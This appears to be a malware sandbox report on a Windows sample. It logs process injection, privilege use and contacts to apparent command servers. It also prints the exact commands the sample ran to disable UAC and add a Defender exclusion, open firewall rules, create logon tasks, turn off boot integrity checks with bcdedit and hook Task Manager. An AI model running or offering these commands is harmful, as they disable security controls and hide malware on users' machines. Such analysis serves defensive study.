N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2604 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2604 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2604 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2604 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 2604 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 2604 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 2604 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 2604 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 2604 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 2604 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 2604 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2604 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2604 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2604 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2604 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2604 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2604 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2604 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2604 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2604 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\system32\WerFault.exe
PID 2604 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\system32\WerFault.exe
PID 2604 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\system32\WerFault.exe
PID 2796 wrote to memory of 2080 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\JvwmkpsShYOZx2FO997TqdmI.exe
PID 2796 wrote to memory of 2080 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\JvwmkpsShYOZx2FO997TqdmI.exe
PID 2796 wrote to memory of 2080 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\JvwmkpsShYOZx2FO997TqdmI.exe
PID 2796 wrote to memory of 2080 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\JvwmkpsShYOZx2FO997TqdmI.exe
PID 2796 wrote to memory of 2308 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe
PID 2796 wrote to memory of 2308 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe
PID 2796 wrote to memory of 2308 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe
PID 2796 wrote to memory of 2308 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe
PID 2796 wrote to memory of 948 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe
PID 2796 wrote to memory of 948 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe
PID 2796 wrote to memory of 948 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe
PID 2796 wrote to memory of 948 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe
PID 2796 wrote to memory of 2160 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe
PID 2796 wrote to memory of 2160 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe
PID 2796 wrote to memory of 2160 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe
PID 2796 wrote to memory of 2160 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe
PID 2796 wrote to memory of 692 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe
PID 2796 wrote to memory of 692 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe
PID 2796 wrote to memory of 692 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe
PID 2796 wrote to memory of 692 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe
PID 2080 wrote to memory of 840 N/A C:\Users\Admin\Pictures\JvwmkpsShYOZx2FO997TqdmI.exe C:\Users\Admin\AppData\Local\Temp\u1ls.0.exe
PID 2080 wrote to memory of 840 N/A C:\Users\Admin\Pictures\JvwmkpsShYOZx2FO997TqdmI.exe C:\Users\Admin\AppData\Local\Temp\u1ls.0.exe
PID 2080 wrote to memory of 840 N/A C:\Users\Admin\Pictures\JvwmkpsShYOZx2FO997TqdmI.exe C:\Users\Admin\AppData\Local\Temp\u1ls.0.exe
PID 2080 wrote to memory of 840 N/A C:\Users\Admin\Pictures\JvwmkpsShYOZx2FO997TqdmI.exe C:\Users\Admin\AppData\Local\Temp\u1ls.0.exe
PID 2080 wrote to memory of 1608 N/A C:\Users\Admin\Pictures\JvwmkpsShYOZx2FO997TqdmI.exe C:\Users\Admin\AppData\Local\Temp\u1ls.1.exe
PID 2080 wrote to memory of 1608 N/A C:\Users\Admin\Pictures\JvwmkpsShYOZx2FO997TqdmI.exe C:\Users\Admin\AppData\Local\Temp\u1ls.1.exe
PID 2080 wrote to memory of 1608 N/A C:\Users\Admin\Pictures\JvwmkpsShYOZx2FO997TqdmI.exe C:\Users\Admin\AppData\Local\Temp\u1ls.1.exe
PID 2080 wrote to memory of 1608 N/A C:\Users\Admin\Pictures\JvwmkpsShYOZx2FO997TqdmI.exe C:\Users\Admin\AppData\Local\Temp\u1ls.1.exe
PID 1728 wrote to memory of 1652 N/A C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe C:\Windows\system32\cmd.exe
PID 1728 wrote to memory of 1652 N/A C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe C:\Windows\system32\cmd.exe
PID 1728 wrote to memory of 1652 N/A C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe C:\Windows\system32\cmd.exe
PID 1728 wrote to memory of 1652 N/A C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 1236 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1652 wrote to memory of 1236 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1652 wrote to memory of 1236 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1728 wrote to memory of 2932 N/A C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe C:\Windows\rss\csrss.exe
PID 1728 wrote to memory of 2932 N/A C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe C:\Windows\rss\csrss.exe
PID 1728 wrote to memory of 2932 N/A C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe C:\Windows\rss\csrss.exe
PID 1728 wrote to memory of 2932 N/A C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe C:\Windows\rss\csrss.exe
PID 1784 wrote to memory of 1552 N/A C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe C:\Windows\system32\cmd.exe
PID 1784 wrote to memory of 1552 N/A C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe C:\Windows\system32\cmd.exe
PID 1784 wrote to memory of 1552 N/A C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe C:\Windows\system32\cmd.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe

"C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2604 -s 836

C:\Users\Admin\Pictures\JvwmkpsShYOZx2FO997TqdmI.exe

"C:\Users\Admin\Pictures\JvwmkpsShYOZx2FO997TqdmI.exe"

C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe

"C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe"

C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe

"C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe"

C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe

"C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe"

C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe

"C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe"

C:\Users\Admin\AppData\Local\Temp\u1ls.0.exe

"C:\Users\Admin\AppData\Local\Temp\u1ls.0.exe"

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240508235243.log C:\Windows\Logs\CBS\CbsPersist_20240508235243.cab

C:\Users\Admin\AppData\Local\Temp\u1ls.1.exe

"C:\Users\Admin\AppData\Local\Temp\u1ls.1.exe"

C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe

"C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe

"C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe"

C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe

"C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe"

C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe

"C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe"

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 nic-it.nl udp
US 8.8.8.8:53 onlycitylink.com udp
US 8.8.8.8:53 yip.su udp
US 8.8.8.8:53 realdeepai.org udp
US 8.8.8.8:53 onlycitylink.com udp
US 8.8.8.8:53 realdeepai.org udp
DE 185.172.128.59:80 185.172.128.59 tcp
RU 193.233.132.234:80 tcp
RU 193.233.132.234:80 tcp
US 104.21.18.166:443 onlycitylink.com tcp
US 172.67.182.192:443 onlycitylink.com tcp
US 172.67.169.89:443 yip.su tcp
US 172.67.193.79:443 realdeepai.org tcp
US 172.67.193.79:443 realdeepai.org tcp
DE 138.201.79.103:80 nic-it.nl tcp
US 8.8.8.8:53 firstfirecar.com udp
US 8.8.8.8:53 firstfirecar.com udp
US 8.8.8.8:53 jonathantwo.com udp
US 8.8.8.8:53 jonathantwo.com udp
US 104.21.60.76:443 firstfirecar.com tcp
US 104.21.60.76:443 firstfirecar.com tcp
US 104.21.31.124:443 jonathantwo.com tcp
US 172.67.176.131:443 jonathantwo.com tcp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 apps.identrust.com udp
US 2.18.190.80:80 apps.identrust.com tcp
US 2.18.190.81:80 apps.identrust.com tcp
US 2.18.190.81:80 apps.identrust.com tcp
US 2.18.190.80:80 apps.identrust.com tcp
DE 185.172.128.90:80 tcp
DE 185.172.128.228:80 185.172.128.228 tcp
DE 185.172.128.59:80 185.172.128.59 tcp
DE 185.172.128.228:80 185.172.128.228 tcp
US 8.8.8.8:53 svc.iolo.com udp
US 20.157.87.45:80 svc.iolo.com tcp
DE 185.172.128.150:80 tcp
US 8.8.8.8:53 download.iolo.net udp
FR 185.93.2.246:80 download.iolo.net tcp
DE 185.172.128.150:80 tcp
US 20.157.87.45:80 svc.iolo.com tcp
DE 185.172.128.150:80 tcp
US 8.8.8.8:53 9f16c723-2fae-4073-ae52-49abeeeb004f.uuid.thestatsfiles.ru udp
US 8.8.8.8:53 msdl.microsoft.com udp
US 204.79.197.219:443 msdl.microsoft.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard30.blob.core.windows.net udp
US 20.150.38.228:443 vsblobprodscussu5shard30.blob.core.windows.net tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.150:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.150:443 westus2-2.in.applicationinsights.azure.com tcp
DE 185.172.128.150:80 tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
